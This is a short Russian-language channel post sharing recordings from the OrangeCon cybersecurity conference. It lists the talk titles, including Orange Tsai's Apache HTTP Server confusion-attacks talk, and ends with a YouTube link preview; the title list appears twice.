research // poc
Записи с конференции по кибербезу OrangeCon. Как раз на ней представили доклад, который занял первое место в топе Portswigger.
— Confusion Attacks: Exploiting Hidden Semantic Ambiguity In Apache HTTP Server!
— Offensive Development In Modern Languages
— The Registry Rundown
— How To Crack Seven Billion Passwords?
— Orange Is The New Black
— All Cops Are Broadcasting: Breaking TETRA After Decades In The Shadows
— Low Energy To High Energy: Hacking Nearby EV-Chargers Over Bluetooth
— Cybersecurity’s New Imperative: Metawar Defending The Cognitive Infrastructure
— From COM Object Fundamentals To UAC Bypasses
— Graph API Mastery: Logs To Real World Attacks
— Securing OT, Too Hard Or Not For Me?
— Protecting Organizations Against AITM: Lessons Learned
— Attacking Primary Refresh Tokens Using Their MacOS Implementation
— Making Penetration Testing Auditable
— An Angel, Python, Root And Config Walked Into A Bar...
— Securing Devices Or Profit? Examining The Device Security Of A Network Appliance Vendor
— Exploiting The Core: A Deep Dive Into Kernel Driver Vulnerability Hunting
— Confusion Attacks: Exploiting Hidden Semantic Ambiguity In Apache HTTP Server!
— Offensive Development In Modern Languages
— The Registry Rundown
— How To Crack Seven Billion Passwords?
— Orange Is The New Black
— All Cops Are Broadcasting: Breaking TETRA After Decades In The Shadows
— Low Energy To High Energy: Hacking Nearby EV-Chargers Over Bluetooth
— Cybersecurity’s New Imperative: Metawar Defending The Cognitive Infrastructure
— From COM Object Fundamentals To UAC Bypasses
— Graph API Mastery: Logs To Real World Attacks
— Securing OT, Too Hard Or Not For Me?
— Protecting Organizations Against AITM: Lessons Learned
— Attacking Primary Refresh Tokens Using Their MacOS Implementation
— Making Penetration Testing Auditable
— An Angel, Python, Root And Config Walked Into A Bar...
— Securing Devices Or Profit? Examining The Device Security Of A Network Appliance Vendor
— Exploiting The Core: A Deep Dive Into Kernel Driver Vulnerability Hunting
YouTube
Confusion Attacks: Exploiting Hidden Semantic Ambiguity In Apache HTTP Server! - Orange Tsai
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.